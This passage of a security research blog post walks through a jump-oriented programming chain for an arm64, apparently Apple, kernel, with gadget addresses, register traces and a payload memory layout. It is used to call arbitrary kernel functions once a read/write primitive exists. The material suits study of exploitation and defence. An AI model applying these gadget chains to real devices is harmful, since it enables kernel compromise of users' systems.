;; We will populate registers using GADGET_POPULATE_2. Since we're using this
;; gadget with JOP_DISPATCH, we first need to initialize x20 to JOP_CHAIN_2 and
;; x23 to REGION_POPULATE_VALUES.
JOP_DISPATCH (0xfffffff006a4e1a8):
ldp x2, x1, [x1]
br x2
x2 = MOV_X23_X19__BR_X8
pc = MOV_X23_X19__BR_X8
MOV_X23_X19__BR_X8 (0xfffffff00674c99c)
mov x23, x19
br x8
x23 = REGION_POPULATE_VALUES
pc = JOP_DISPATCH
x2 = GADGET_INITIALIZE_X20_1
pc = GADGET_INITIALIZE_X20_1
GADGET_INITIALIZE_X20_1 (0xfffffff006291d34):
;; This is a hack to get x20 to point to JOP_CHAIN_2 before
;; using GADGET_POPULATE_2.
ldr x20, [x19, #0xc0]
ldr x8, [x0]
ldr x8, [x8, #0xa0]
blr x8
x20 = REGION_POPULATE_VALUES[0xc0] = JOP_CHAIN_2
x8 = REGION_POPULATE_VALUES[0] = REGION_1
x8 = REGION_1[0xa0] = JOP_DISPATCH
pc = JOP_DISPATCH
x2 = MOV_X25_X19__BR_X8
pc = MOV_X25_X19__BR_X8
;; We're about to execute GADGET_POPULATE_2. We want to fill the following
;; registers:
;; x19 = ARGUMENT_0
;; x20 = ARGUMENT_1
;; x21 = ARGUMENT_13
;; x22 = ARGUMENT_12
;; x23 = REGION_ARGUMENTS_2_TO_11
;; x24 = FUNCTION
;; x25 = REGION_POPULATE_VALUES (CALL_RESUME)
;; Last of all we want to set:
;; x8 = GADGET_CALL_FUNCTION_1
;; pc = GADGET_POPULATE_2
;; The GADGET_POPULATE_2 gadget will give us control of the following
;; registers:
;; x3, x4, x5, x6, x7, x9, x10, x11, x12
;; Since we already have REGION_POPULATE_VALUES in x19, we'll set x25 now.
MOV_X25_X19__BR_X8 (0xfffffff006707570):
mov x25, x19
br x8
x25 = REGION_POPULATE_VALUES
pc = JOP_DISPATCH
x2 = GADGET_POPULATE_2
pc = GADGET_POPULATE_2
GADGET_POPULATE_2 (0xfffffff006ce40e4):
ldp x2, x3, [x23]
ldp x4, x5, [x23, #0x10]
ldp x6, x7, [x23, #0x20]
ldp x9, x10, [x23, #0x30]
ldp x11, x12, [x23, #0x40]
stp x22, x21, [sp, #0x20]
stp x11, x12, [sp, #0x10]
stp x9, x10, [sp]
mov x0, x19
mov x1, x20
blr x8
x0 = REGION_POPULATE_VALUES
x1 = JOP_CHAIN_2
x2 = REGION_POPULATE_VALUES[0] = REGION_1
x3 = REGION_POPULATE_VALUES[0x8] = ARGUMENT_0
x4 = REGION_POPULATE_VALUES[0x10] = ARGUMENT_13
x5 = REGION_POPULATE_VALUES[0x18] = REGION_ARGUMENTS_2_TO_11
x6 = REGION_POPULATE_VALUES[0x20] = ARGUMENT_1
x7 = REGION_POPULATE_VALUES[0x28] = FUNCTION
x9 = REGION_POPULATE_VALUES[0x30] = GADGET_CALL_FUNCTION_1
x10 = REGION_POPULATE_VALUES[0x38] = GADGET_POPULATE_2
x11 = REGION_POPULATE_VALUES[0x40]
x12 = REGION_POPULATE_VALUES[0x48] = ARGUMENT_12
pc = JOP_DISPATCH
x2 = MOV_X19_X3__BR_X8
pc = MOV_X19_X3__BR_X8
;; Now that we've populated the registers, we just need to move the values to
;; where they belong.
MOV_X19_X3__BR_X8 (0xfffffff0068804cc):
mov x19, x3
br x8
x19 = ARGUMENT_0
pc = JOP_DISPATCH
x2 = MOV_X20_X6__BLR_X8
pc = MOV_X20_X6__BLR_X8
MOV_X20_X6__BLR_X8 (0xfffffff0070e3738):
mov x20, x6
blr x8
x20 = ARGUMENT_1
pc = JOP_DISPATCH
x2 = MOV_X21_X4__BLR_X8
pc = MOV_X21_X4__BLR_X8
MOV_X21_X4__BLR_X8 (0xfffffff00677a398):
mov x21, x4
blr x8
x21 = ARGUMENT_13
pc = JOP_DISPATCH
x2 = MOV_X22_X12__BLR_X8
pc = MOV_X22_X12__BLR_X8
MOV_X22_X12__BLR_X8 (0xfffffff0067f9dfc):
mov x22, x12
blr x8
x22 = ARGUMENT_12
pc = JOP_DISPATCH
x2 = MOV_X23_X5__BR_X8
pc = MOV_X23_X5__BR_X8
MOV_X23_X5__BR_X8 (0xfffffff00678bdbc):
mov x23, x5
br x8
x23 = REGION_ARGUMENTS_2_TO_11
pc = JOP_DISPATCH
x2 = MOV_X24_X7__BLR_X8
pc = MOV_X24_X7__BLR_X8
MOV_X24_X7__BLR_X8 (0xfffffff006879350):
mov x24, x7
blr x8
x24 = FUNCTION
pc = JOP_DISPATCH
x2 = MOV_X8_X9__BR_X10
pc = MOV_X8_X9__BR_X10
MOV_X8_X9__BR_X10 (0xfffffff0067163d0):
mov x8, x9
br x10
x8 = GADGET_CALL_FUNCTION_1
pc = GADGET_POPULATE_2
;; At this point, we have set the following registers:
;; x8 = GADGET_CALL_FUNCTION_1
;; x19 = ARGUMENT_0
;; x20 = ARGUMENT_1
;; x21 = ARGUMENT_13
;; x22 = ARGUMENT_12
;; x23 = REGION_ARGUMENTS_2_TO_11
;; x24 = FUNCTION
;; x25 = REGION_POPULATE_VALUES
;; pc = GADGET_POPULATE_2
GADGET_POPULATE_2 (0xfffffff006ce40e4):
ldp x2, x3, [x23]
ldp x4, x5, [x23, #0x10]
ldp x6, x7, [x23, #0x20]
ldp x9, x10, [x23, #0x30]
ldp x11, x12, [x23, #0x40]
stp x22, x21, [sp, #0x20]
stp x11, x12, [sp, #0x10]
stp x9, x10, [sp]
mov x0, x19
mov x1, x20
blr x8
x0 = ARGUMENT_0
x1 = ARGUMENT_1
x2 = ARGUMENT_2
x3 = ARGUMENT_3
x4 = ARGUMENT_4
x5 = ARGUMENT_5
x6 = ARGUMENT_6
x7 = ARGUMENT_7
x9 = ARGUMENT_8
x10 = ARGUMENT_9
x11 = ARGUMENT_10
x12 = ARGUMENT_11
STACK = [
ARGUMENT_8
ARGUMENT_9
ARGUMENT_10
ARGUMENT_11
ARGUMENT_12
ARGUMENT_13
?
?
]
pc = GADGET_CALL_FUNCTION_1
;; Now all the arguments are set up correctly and we will execute
;; GADGET_CALL_FUNCTION_1. The following gadget allows us to resume execution
;; after the function call without messing with x30.
GADGET_CALL_FUNCTION_1 (0xfffffff00753ac98):
blr x24
mov x19, x0
ldr x8, [x25]
ldr x8, [x8, #0xd0]
mov x0, x25
blr x8
pc = FUNCTION
x0 = RESULT
x19 = RESULT
x8 = REGION_POPULATE_VALUES[0] = REGION_1
x8 = REGION_1[0xd0] = GADGET_STORE_RESULT_2
x0 = REGION_POPULATE_VALUES
pc = GADGET_STORE_RESULT_2
GADGET_STORE_RESULT_2 (0xfffffff00629ee70):
str x19, [x0, #0x288]
ldr x0, [x0, #0x268]
ldr x8, [x0]
ldr x8, [x8, #0x158]
blr x8
REGION_POPULATE_VALUES[0x288] = RESULT
x0 = REGION_POPULATE_VALUES[0x268] = REGION_2
x8 = REGION_2[0] = REGION_3
x8 = REGION_3[0x158] = GADGET_EPILOGUE_2
pc = GADGET_EPILOGUE_2
GADGET_EPILOGUE_2 (0xfffffff0070ef450):
;; Reset stack to entry conditions and return to caller. sp
;; must have been preserved from the prologue.
ldp x29, x30, [sp, #0x90]
ldp x20, x19, [sp, #0x80]
ldp x22, x21, [sp, #0x70]
ldp x24, x23, [sp, #0x60]
ldp x26, x25, [sp, #0x50]
ldp x28, x27, [sp, #0x40]
add sp, sp, #0xa0
ret
RESTORE_REGISTERS(x19, ..., x28)
pc = CALLER
Laying out the payload in memory
The only thing left is figuring out how to lay the payload out in memory. Ideally we’d want to take up the minimal amount of space possible. Fortunately, this process is relatively straightforward: look at the span of each memory region and the gaps in each region and try to fit them together like puzzle pieces.
This is the design I eventually settled on for call strategy 5:
0 1 2 3 4 5 6 7 8 9 a b c d e f
+----------------------------------------------------------------+
0 |BB BBAAAAAAAAAAAAAAAA AACCCCCCCCCCCCCCCCCCCCDDEE AA|
100 |JJJJJJJJJJJJJJJJKKKKKKKKKKKKKKKKKKKKKKKKKKKK |
200 | AA ** BB |
+----------------------------------------------------------------+
0 1 2 3 4 5 6 7 8 9 a b c d e f
A = REGION_POPULATE_VALUES = 0 - 270 @ 38
* = RESULT = 0 - 8 @ 288 + REGION_POPULATE_VALUES
B = REGION_1 = a0 - 398 @ -a0
C = REGION_ARGUMENTS_2_TO_11 = 0 - 50 @ 88
D = REGION_2 = 0 - 8 @ d8
E = REGION_3 = 158 - 160 @ -78
J = JOP_CHAIN_1 = 0 - 40 @ 100
K = JOP_CHAIN_2 = 0 - 70 @ 140
Getting it right the first time
In my experience, the most important part of creating a JOP payload in a restricted environment (that is, where you cannot debug the program) is making sure to get it right the first time. Debugging exploit payloads via trial-and-error is hard: every time I have been forced to debug, the time spent debugging significantly outweighed all the other development steps combined. However, with a careful design and documentation process, it’s possible to get it right the first time more often than not.
For me, the key is to document exactly how every piece of the JOP program works before writing any other code. (You can see an example of this in the file-level comment in call_strategy_5.c: the file comment, which was completed before anything else was even written, contains the full text contents of the JOP program above.) I only start writing code once I’ve verified that every single step of the JOP program is correct and specified exactly how the payload will be laid out in memory. That way, I can check the code simply by comparing the generated JOP payload to the expected layout. Since rigorous verification ensures that errors in the initial design are rare, once I’ve checked that the generated payload looks correct, I can be pretty confident that it will work as expected.
Conclusion
Designing a JOP program can be complicated, but I hope that this post has shed some light on how it can be done. In many ways designing a JOP program is like putting together a jigsaw puzzle: it’s all about finding the pieces and figuring out how they best fit together. If you go in knowing what you want and with a methodical approach, it’s relatively straightforward (if a bit technical and tedious).
Footnotes
-
I’ve gotten in the habit of referring to jump-oriented programs as “JOP programs”, despite the redundancy of the “P”. And no, in case you’re wondering, that does not mean automated teller machines should be referred to as “ATM machines”. It’s simply because I need to distinguish between “JOP” as a technique and “JOP programs” as a specific implementation of that technique. ↩
-
Of course, if you have a kernel memory read/write primitive, as I’m assuming for this post, then you could perform almost all actions directly in userspace anyway. However, it’s usually easier to call a kernel function than it is to reimplement that kernel function in userspace using read/write primitives. ↩
-
I’m not sure why Apple refers to its architecture as arm64 while ARM refers to the 64-bit ARMv8 execution state as AArch64. ↩
-
My ROPgadget patch adds a few lines so that all segments and sections marked with the execute memory protection get processed. I’ll try to clean it up and publish it sometime soon. ↩
-
Here we are assuming that all the saved arguments in the structure are 64 bits, which means we have full control of the top 6 words of the stack. Thus, even if the true arguments to the target function are not 64-bit words, we can pad the true arguments inside 6 “fake” arguments so that the target function receives the true arguments with their expected alignment. ↩
-
The first two gadgets might initially seem useful because they load register
x8
, the function to call, from memory. However, these gadgets probably cause more trouble than they’re worth because registerx8
is loaded viax19
, which is used as argument 0 (registerx0
) to the target function call. Clearly we have no control over what argument 0 to the target function is (it may not even be a pointer), so the only way this is workable is if we load another gadget intox8
that fixesx0
before jumping to the true function. But at this point we’ve already lost the advantage provided by those instructions, so we might as well get rid of them. ↩